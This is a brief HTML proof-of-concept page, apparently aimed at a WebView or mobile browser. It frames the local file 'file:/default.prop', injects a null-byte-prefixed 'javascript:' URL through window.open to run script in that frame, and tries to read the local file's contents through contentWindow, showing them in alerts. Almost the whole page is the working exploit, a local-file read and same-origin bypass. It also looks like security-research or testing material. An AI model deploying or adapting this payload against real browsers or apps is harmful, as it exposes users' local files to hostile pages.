<button onclick="exploit()">Read iframe</button>
<button onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">Try \u0000</button>
<iframe src="file:/default.prop" name="test" style='width:100%;height:200'></iframe>
<script>
function exploit() {
var iframe = document.getElementsByTagName('iframe')[0];
try{
alert("Try to read local file.");
alert("contentWindow:"+iframe.contentWindow);
alert("document:"+iframe.contentWindow.document);
alert("body:"+iframe.contentWindow.document.body);
alert("innerHTML:"+iframe.contentWindow.document.body.innerHTML);
} catch(e) {
alert(e);
}
}
</script>
Click to Open Code Editor